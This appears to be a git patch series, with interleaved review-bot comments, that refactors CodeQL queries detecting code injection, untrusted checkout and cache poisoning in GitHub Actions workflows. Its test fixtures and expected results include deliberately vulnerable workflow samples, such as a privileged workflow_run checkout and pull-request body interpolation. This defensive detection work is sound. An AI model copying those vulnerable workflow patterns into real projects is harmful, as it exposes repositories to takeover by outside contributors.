index 3ad4e6915d23..609b09fdfef4 100644
--- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected
@@ -438,6 +438,7 @@ subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | #select +| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml index e0d32875ee70..0a38be8b12be 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml @@ -1,6 +1,6 @@ name: Test on: - workflow_call: + workflow_run: workflows: [Trigger] types: [completed] diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 13637396f90e..afae24540787 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -274,6 +274,7 @@ edges | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. | | .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | Execution of untrusted code on a privileged workflow. | From b1ddbc9d13dab6b653f4c8aebdda2eb0df87635e Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 25 Sep 2024 15:25:56 +0200 Subject: [PATCH 538/707] Improve Control Checks --- ql/lib/codeql/actions/Ast.qll | 6 +- ql/lib/codeql/actions/Helper.qll | 38 +--------- ql/lib/codeql/actions/ast/internal/Ast.qll | 67 ++++++++--------- .../codeql/actions/security/ControlChecks.qll | 7 +- .../Security/CWE-074/OutputClobberingHigh.ql | 13 +--- .../CWE-077/EnvPathInjectionCritical.ql | 13 +--- .../CWE-077/EnvVarInjectionCritical.ql | 17 ++--- .../CWE-078/CommandInjectionCritical.ql | 4 +- .../CWE-088/ArgumentInjectionCritical.ql | 8 +- .../Security/CWE-094/CodeInjectionCritical.ql | 10 +-- .../CWE-349/CachePoisoningViaCodeInjection.ql | 18 ++--- .../CWE-349/CachePoisoningViaDirectCache.ql | 29 ++++---- .../CachePoisoningViaPoisonableStep.ql | 25 ++++--- .../UntrustedCheckoutTOCTOUCritical.ql | 16 ++-- .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 11 +-- .../CWE-829/ArtifactPoisoningCritical.ql | 7 +- .../CWE-829/ArtifactPoisoningPathTraversal.ql | 5 +- .../CWE-829/UntrustedCheckoutCritical.ql | 12 +-- .../Security/CWE-829/UntrustedCheckoutHigh.ql | 3 +- .../CWE-829/UntrustedCheckoutMedium.ql | 2 - .../CWE-094/CodeInjectionMedium.expected | 1 - .../UntrustedCheckoutCritical.expected | 73 ++++++++++--------- 22 files changed, 168 insertions(+), 217 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index c83abb1ea1dd..a1651eedc47d 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -79,8 +79,6 @@ class CompositeAction extends AstNode instanceof CompositeActionImpl { UsesStep getACallerStep() { result = super.getACallerStep() } predicate isPrivileged() { super.isPrivileged() } - - predicate isPrivilegedExternallyTriggerable() { super.isPrivilegedExternallyTriggerable() } } /** 
@@ -200,7 +198,9 @@ abstract class Job extends AstNode instanceof JobImpl { predicate isPrivileged() { super.isPrivileged() } - predicate isPrivilegedExternallyTriggerable() { super.isPrivilegedExternallyTriggerable() } + predicate isPrivilegedExternallyTriggerable(Event event) { + super.isPrivilegedExternallyTriggerable(event) + } } abstract class StepsContainer extends AstNode instanceof StepsContainerImpl { diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 0df7b1250199..9356950f5717 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -238,44 +238,12 @@ predicate fileToGitHubPath(Run run, string path) { fileToFileWrite(run.getScript(), "GITHUB_PATH", path) } -predicate inPrivilegedCompositeAction(AstNode node) { - exists(CompositeAction a | - a = node.getEnclosingCompositeAction() and - a.isPrivilegedExternallyTriggerable() - ) -} - -predicate inPrivilegedExternallyTriggerableJob(AstNode node) { - exists(Job j | - j = node.getEnclosingJob() and - j.isPrivilegedExternallyTriggerable() - ) -} - -predicate inPrivilegedContext(AstNode node) { - inPrivilegedCompositeAction(node) - or - inPrivilegedExternallyTriggerableJob(node) -} - -predicate inNonPrivilegedCompositeAction(AstNode node) { - exists(CompositeAction a | - a = node.getEnclosingCompositeAction() and - not a.isPrivilegedExternallyTriggerable() - ) -} - -predicate inNonPrivilegedJob(AstNode node) { - exists(Job j | - j = node.getEnclosingJob() and - not j.isPrivilegedExternallyTriggerable() - ) +predicate inPrivilegedContext(AstNode node, Event event) { + node.getEnclosingJob().isPrivilegedExternallyTriggerable(event) } predicate inNonPrivilegedContext(AstNode node) { - inNonPrivilegedCompositeAction(node) - or - inNonPrivilegedJob(node) + not node.getEnclosingJob().isPrivilegedExternallyTriggerable(_) } string partialFileContentRegexp() { 
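Review bot: `inNonPrivilegedContext` now holds vacuously for a node that has no enclosing job at all, since `not node.getEnclosingJob().isPrivilegedExternallyTriggerable(_)` is true whenever `getEnclosingJob()` has no result, whereas the removed `inNonPrivilegedJob` and `inNonPrivilegedCompositeAction` each required an enclosing job or composite action to exist. Workflow-level nodes that sit outside every job therefore move from "excluded" to "non-privileged"; whether any query sink can occur there is not visible in this hunk. Keeping the existence requirement preserves the previous scope: `(exists(node.getEnclosingJob()) or exists(node.getEnclosingCompositeAction())) and not node.getEnclosingJob().isPrivilegedExternallyTriggerable(_)`.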
diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 7659661bdac9..154d466ab7df 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -359,18 +359,6 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { } EventImpl getATriggerEvent() { result = this.getACallerJob().getATriggerEvent() } - - /** Holds if the action is privileged and externally triggerable. */ - predicate isPrivilegedExternallyTriggerable() { - // the action is externally triggerable - exists(JobImpl caller, EventImpl event | - caller = this.getACallerJob() and - event = caller.getATriggerEvent() and - event.isExternallyTriggerable() and - // the action is privileged - (this.isPrivileged() or caller.isPrivileged()) - ) - } } class WorkflowImpl extends AstNodeImpl, TWorkflowNode { 
@@ -970,31 +958,30 @@ class JobImpl extends AstNodeImpl, TJobNode { } /** Holds if the action is privileged and externally triggerable. */ - predicate isPrivilegedExternallyTriggerable() { - exists(EventImpl e | this.getATriggerEvent() = e | - // job is triggereable by an external user - e.isExternallyTriggerable() and - // no matter if `pull_request` is granted write permissions or access to secrets - // when the job is triggered by a `pull_request` event from a fork, they will get revoked - not e.getName() = "pull_request" and - ( - // job is privileged (write access or access to secrets) - this.isPrivileged() - or - // the trigger event is __normally__ privileged - e.isPrivileged() and - // and we have no runtime data to prove otherwise - not this.hasRuntimeData() and - // and the job is not explicitly non-privileged - not ( - ( - this.hasExplicitNonePermission() or - this.hasImplicitNonePermission() or - this.hasExplicitReadPermission() or - this.hasImplicitReadPermission() - ) and - not this.hasExplicitSecretAccess() - ) + predicate isPrivilegedExternallyTriggerable(EventImpl event) { + this.getATriggerEvent() = event and + // job is triggereable by an external user + event.isExternallyTriggerable() and + // no matter if `pull_request` is granted write permissions or access to secrets + // when the job is triggered by a `pull_request` event from a fork, they will get revoked + not event.getName() = "pull_request" and + ( + // job is privileged (write access or access to secrets) + this.isPrivileged() + or + // the trigger event is __normally__ privileged + event.isPrivileged() and + // and we have no runtime data to prove otherwise + not this.hasRuntimeData() and + // and the job is not explicitly non-privileged + not ( + ( + this.hasExplicitNonePermission() or + this.hasImplicitNonePermission() or + this.hasExplicitReadPermission() or + this.hasImplicitReadPermission() + ) and + not this.hasExplicitSecretAccess() ) ) } 
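Review bot: The QLDoc above `isPrivilegedExternallyTriggerable(EventImpl event)` still says "Holds if the action is privileged and externally triggerable" although this is a `JobImpl` member, and the new `event` parameter is not documented; the comment inside the body also misspells "triggerable" as "triggereable". I would replace the header with `/** Holds if this job is privileged and one of its trigger events, event, can be fired by an external user. */`. Since `event` is bound only through `this.getATriggerEvent() = event`, the doc should also say that callers may pass it unbound to enumerate the qualifying events, which is how `inNonPrivilegedContext` in this same commit uses it with `_`.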
@@ -1073,6 +1060,12 @@ class StepImpl extends AstNodeImpl, TStepNode { override YamlMapping getNode() { result = n } + override JobImpl getEnclosingJob() { + // if a step is within a composite action, we should follow the caller job + result = this.getEnclosingCompositeAction().getACallerJob() or + result = super.getEnclosingJob() + } + EnvImpl getEnv() { result.getNode() = n.lookup("env") } /** Gets the ID of this step, if any. */ diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 1a3e1e15fe8c..052b22cd3387 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -38,9 +38,12 @@ abstract class ControlCheck extends AstNode { } predicate protects(Step step, Event event, string category) { - event = step.getEnclosingWorkflow().getATriggerEvent() and + // The check dominates the step it should protect this.dominates(step) and - this.protectsCategoryAndEvent(category, event.getName()) + // The check is effective against the event and category + this.protectsCategoryAndEvent(category, event.getName()) and + // The check can be triggered by the event + this.getEnclosingJob().getATriggerEvent() = event } predicate dominates(Step step) { diff --git a/ql/src/Security/CWE-074/OutputClobberingHigh.ql b/ql/src/Security/CWE-074/OutputClobberingHigh.ql index 0ead5aa76890..2000e2100aef 100644 --- a/ql/src/Security/CWE-074/OutputClobberingHigh.ql +++ b/ql/src/Security/CWE-074/OutputClobberingHigh.ql 
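Review bot: The `getEnclosingJob` override added to `StepImpl` repeats the disjunction that PATCH 535 earlier in this series already put into `AstNodeImpl.getEnclosingJob` (`result = this.getEnclosingCompositeAction().getACallerJob()` or the parent-based lookup), and none of the hunks shown here changes the base-class version back, so unless that happened outside the visible hunks the override is redundant. QL `or` carries no preference, so the comment `// if a step is within a composite action, we should follow the caller job` does not make the caller job take priority over `super.getEnclosingJob()`; both results are returned. I would drop the override, or, if composite-action steps are meant to resolve only to caller jobs, write that as a guarded disjunction instead of duplicating the base class.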
@@ -18,25 +18,20 @@ import codeql.actions.dataflow.ExternalFlow import OutputClobberingFlow::PathGraph import codeql.actions.security.ControlChecks -from OutputClobberingFlow::PathNode source, OutputClobberingFlow::PathNode sink +from OutputClobberingFlow::PathNode source, OutputClobberingFlow::PathNode sink, Event event where OutputClobberingFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) and + inPrivilegedContext(sink.getNode().asExpr(), event) and // exclude paths to file read sinks from non-artifact sources ( not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "code-injection") + check.protects(sink.getNode().asExpr(), event, "code-injection") ) or source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), - ["untrusted-checkout", "artifact-poisoning"]) + check.protects(sink.getNode().asExpr(), event, ["untrusted-checkout", "artifact-poisoning"]) ) and ( sink.getNode() instanceof OutputClobberingFromFileReadSink or diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql index 9fa066d195ce..54e013f1091d 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql 
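Review bot: `Event event` is added to the `from` clause of this query, but the `select` (outside the hunk) does not surface it, so the alert no longer says which trigger event makes the sink both privileged and unprotected, and the per-event rows collapse into one. The same applies to the hunks for EnvPathInjectionCritical.ql, EnvVarInjectionCritical.ql, CommandInjectionCritical.ql, ArgumentInjectionCritical.ql, CodeInjectionCritical.ql and ArtifactPoisoningCritical.ql further down, whereas UntrustedCheckoutCritical.ql in this same commit appends `$@` with `event` to its message. For consistent triage I would add the same `$@` placeholder with `event` and `event.getName()` as link text to each of these selects, or state in the query header that an alert is reported once for any qualifying event.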
@@ -17,24 +17,19 @@ import codeql.actions.security.EnvPathInjectionQuery import EnvPathInjectionFlow::PathGraph import codeql.actions.security.ControlChecks -from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink +from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink, Event event where EnvPathInjectionFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) and + inPrivilegedContext(sink.getNode().asExpr(), event) and ( not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "code-injection") + check.protects(sink.getNode().asExpr(), event, "code-injection") ) or source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), - ["untrusted-checkout", "artifact-poisoning"]) + check.protects(sink.getNode().asExpr(), event, ["untrusted-checkout", "artifact-poisoning"]) ) and sink.getNode() instanceof EnvPathInjectionFromFileReadSink ) diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql index 806bae2a91d2..b301915d79c5 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql 
@@ -18,30 +18,23 @@ import codeql.actions.dataflow.ExternalFlow import EnvVarInjectionFlow::PathGraph import codeql.actions.security.ControlChecks -from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink +from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink, Event event where EnvVarInjectionFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) and + inPrivilegedContext(sink.getNode().asExpr(), event) and not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "envvar-injection") + check.protects(sink.getNode().asExpr(), event, "envvar-injection") ) and // exclude paths to file read sinks from non-artifact sources ( not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "code-injection") + check.protects(sink.getNode().asExpr(), event, "code-injection") ) or source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), - ["untrusted-checkout", "artifact-poisoning"]) + check.protects(sink.getNode().asExpr(), event, ["untrusted-checkout", "artifact-poisoning"]) ) and ( sink.getNode() instanceof EnvVarInjectionFromFileReadSink or diff --git a/ql/src/Security/CWE-078/CommandInjectionCritical.ql b/ql/src/Security/CWE-078/CommandInjectionCritical.ql index f5a4aed3eca0..80281e8db30a 100644 --- a/ql/src/Security/CWE-078/CommandInjectionCritical.ql +++ b/ql/src/Security/CWE-078/CommandInjectionCritical.ql 
@@ -17,10 +17,10 @@ import actions import codeql.actions.security.CommandInjectionQuery import CommandInjectionFlow::PathGraph -from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink +from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink, Event event where CommandInjectionFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) + inPrivilegedContext(sink.getNode().asExpr(), event) select sink.getNode(), source, sink, "Potential command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql index 6f1f6008a062..2626de31935a 100644 --- a/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql +++ b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql @@ -16,14 +16,12 @@ import codeql.actions.security.ArgumentInjectionQuery import ArgumentInjectionFlow::PathGraph import codeql.actions.security.ControlChecks -from ArgumentInjectionFlow::PathNode source, ArgumentInjectionFlow::PathNode sink +from ArgumentInjectionFlow::PathNode source, ArgumentInjectionFlow::PathNode sink, Event event where ArgumentInjectionFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) and + inPrivilegedContext(sink.getNode().asExpr(), event) and not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "argument-injection") + check.protects(sink.getNode().asExpr(), event, "argument-injection") ) select sink.getNode(), source, sink, "Potential argument injection in $@ command, which may be controlled by an external user.", sink, diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql index ec4925d24a0c..ef66ac229f2d 100644 
--- a/ql/src/Security/CWE-094/CodeInjectionCritical.ql +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql @@ -19,15 +19,11 @@ import codeql.actions.security.CodeInjectionQuery import CodeInjectionFlow::PathGraph import codeql.actions.security.ControlChecks -from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink +from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, Event event where CodeInjectionFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) and - not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "code-injection") - ) and + inPrivilegedContext(sink.getNode().asExpr(), event) and + not exists(ControlCheck check | check.protects(sink.getNode().asExpr(), event, "code-injection")) and // exclude cases where the sink is a JS script and the expression uses toJson not exists(UsesStep script | script.getCallee() = "actions/github-script" and diff --git a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql index 67b615d115a6..411d0052d4bc 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql 
@@ -18,27 +18,27 @@ import codeql.actions.security.CachePoisoningQuery import CodeInjectionFlow::PathGraph import codeql.actions.security.ControlChecks -from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, LocalJob j, Event e +from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, LocalJob job, Event event where CodeInjectionFlow::flowPath(source, sink) and - j = sink.getNode().asExpr().getEnclosingJob() and - j.getATriggerEvent() = e and + job = sink.getNode().asExpr().getEnclosingJob() and + job.getATriggerEvent() = event and // job can be triggered by an external user - e.isExternallyTriggerable() and + event.isExternallyTriggerable() and // the checkout is not controlled by an access check not exists(ControlCheck check | - check.protects(source.getNode().asExpr(), j.getATriggerEvent(), "code-injection") + check.protects(source.getNode().asExpr(), event, "code-injection") ) and // excluding privileged workflows since they can be exploited in easier circumstances - not j.isPrivileged() and + not job.isPrivileged() and ( // the workflow runs in the context of the default branch - runsOnDefaultBranch(e) + runsOnDefaultBranch(event) or // the workflow caller runs in the context of the default branch - e.getName() = "workflow_call" and + event.getName() = "workflow_call" and exists(ExternalJob caller | - caller.getCallee() = j.getLocation().getFile().getRelativePath() and + caller.getCallee() = job.getLocation().getFile().getRelativePath() and runsOnDefaultBranch(caller.getATriggerEvent()) ) ) diff --git a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql index b6df022329dd..bda8224925ec 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql 
@@ -43,10 +43,10 @@ predicate controlledCachePath(string cache_path, string untrusted_path) { query predicate edges(Step a, Step b) { a.getNextStep() = b } -from LocalJob j, Event e, Step source, Step s, string message, string path +from LocalJob job, Event event, Step source, Step step, string message, string path where // the job checkouts untrusted code from a pull request or downloads an untrusted artifact - j.getAStep() = source and + job.getAStep() = source and ( source instanceof PRHeadCheckoutStep and message = "due to privilege checkout of untrusted code." and 
@@ -58,35 +58,36 @@ where ) and // the checkout/download is not controlled by an access check not exists(ControlCheck check | - check.protects(source, j.getATriggerEvent(), ["untrusted-checkout", "artifact-poisoning"]) + check.protects(source, event, ["untrusted-checkout", "artifact-poisoning"]) ) and - j.getATriggerEvent() = e and + job.getATriggerEvent() = event and // job can be triggered by an external user - e.isExternallyTriggerable() and + event.isExternallyTriggerable() and ( // the workflow runs in the context of the default branch - runsOnDefaultBranch(e) + runsOnDefaultBranch(event) or // the workflow's caller runs in the context of the default branch - e.getName() = "workflow_call" and + event.getName() = "workflow_call" and exists(ExternalJob caller | - caller.getCallee() = j.getLocation().getFile().getRelativePath() and + caller.getCallee() = job.getLocation().getFile().getRelativePath() and runsOnDefaultBranch(caller.getATriggerEvent()) ) ) and // the job writes to the cache // (No need to follow the checkout/download step since the cache is normally write after the job completes) - j.getAStep() = s and - s instanceof CacheWritingStep and + job.getAStep() = step and + step instanceof CacheWritingStep and ( // we dont know what code can be controlled by the attacker path = "?" or // we dont know what files are being cached - s.(CacheWritingStep).getPath() = "?" + step.(CacheWritingStep).getPath() = "?" or // the cache writing step reads from a path the attacker can control - not path = "?" and controlledCachePath(s.(CacheWritingStep).getPath(), path) + not path = "?" and controlledCachePath(step.(CacheWritingStep).getPath(), path) ) and - not s instanceof PoisonableStep -select s, source, s, "Potential cache poisoning in the context of the default branch " + message + not step instanceof PoisonableStep +select step, source, step, + "Potential cache poisoning in the context of the default branch " + message 
diff --git a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql index 0750a02930eb..74f49fccd30a 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql @@ -20,10 +20,10 @@ import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getNextStep() = b } -from LocalJob j, Event e, Step source, Step s, string message, string path +from LocalJob job, Event event, Step source, Step step, string message, string path where // the job checkouts untrusted code from a pull request or downloads an untrusted artifact - j.getAStep() = source and + job.getAStep() = source and ( source instanceof PRHeadCheckoutStep and message = "due to privilege checkout of untrusted code." and 
@@ -35,26 +35,27 @@ where ) and // the checkout/download is not controlled by an access check not exists(ControlCheck check | - check.protects(source, j.getATriggerEvent(), ["untrusted-checkout", "artifact-poisoning"]) + check.protects(source, event, ["untrusted-checkout", "artifact-poisoning"]) ) and - j.getATriggerEvent() = e and + job.getATriggerEvent() = event and // job can be triggered by an external user - e.isExternallyTriggerable() and + event.isExternallyTriggerable() and ( // the workflow runs in the context of the default branch - runsOnDefaultBranch(e) + runsOnDefaultBranch(event) or // the workflow's caller runs in the context of the default branch - e.getName() = "workflow_call" and + event.getName() = "workflow_call" and exists(ExternalJob caller | - caller.getCallee() = j.getLocation().getFile().getRelativePath() and + caller.getCallee() = job.getLocation().getFile().getRelativePath() and runsOnDefaultBranch(caller.getATriggerEvent()) ) ) and // the job executes checked-out code // (The cache specific token can be leaked even for non-privileged workflows) - source.getAFollowingStep() = s and - s instanceof PoisonableStep and + source.getAFollowingStep() = step and + step instanceof PoisonableStep and // excluding privileged workflows since they can be exploited in easier circumstances - not j.isPrivileged() -select s, source, s, "Potential cache poisoning in the context of the default branch " + message + not job.isPrivileged() +select step, source, step, + "Potential cache poisoning in the context of the default branch " + message diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index 7c7ab15de319..11897c464bf9 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql 
@@ -18,16 +18,18 @@ import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getNextStep() = b } -from LocalJob j, MutableRefCheckoutStep checkout, PoisonableStep s, ControlCheck check +from + LocalJob job, MutableRefCheckoutStep checkout, PoisonableStep step, ControlCheck check, + Event event where - j.getAStep() = checkout and + job.getAStep() = checkout and // the checked-out code may lead to arbitrary code execution - checkout.getAFollowingStep() = s and + checkout.getAFollowingStep() = step and // the checkout occurs in a privileged context - inPrivilegedContext(checkout) and + inPrivilegedContext(checkout, event) and // the mutable checkout step is protected by an Insufficient access check - check.protects(checkout, j.getATriggerEvent(), "untrusted-checkout") and - not check.protects(checkout, j.getATriggerEvent(), "untrusted-checkout-toctou") -select s, checkout, s, + check.protects(checkout, event, "untrusted-checkout") and + not check.protects(checkout, event, "untrusted-checkout-toctou") +select step, checkout, step, "Insufficient protection against execution of untrusted code on a privileged workflow on check $@.", check, check.toString() diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index 7f584e00c9ac..5956b52ccbe4 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql 
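Review bot: UntrustedCheckoutTOCTOUCritical.ql relies on `inPrivilegedContext(checkout, event)` alone to bind `event`, while the sibling UntrustedCheckoutTOCTOUHigh.ql hunk below adds the explicit conjunct `event = job.getATriggerEvent()`; the two queries should agree. Since `inPrivilegedContext` already binds `event` to a trigger event of `checkout.getEnclosingJob()` and `job.getAStep() = checkout` ties `job` to that checkout, the extra conjunct is presumably redundant in High and can be dropped there, or it should be added here if `getEnclosingJob` may resolve to a job other than `job` for composite-action steps. The `select` of the High query lies outside its hunk.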
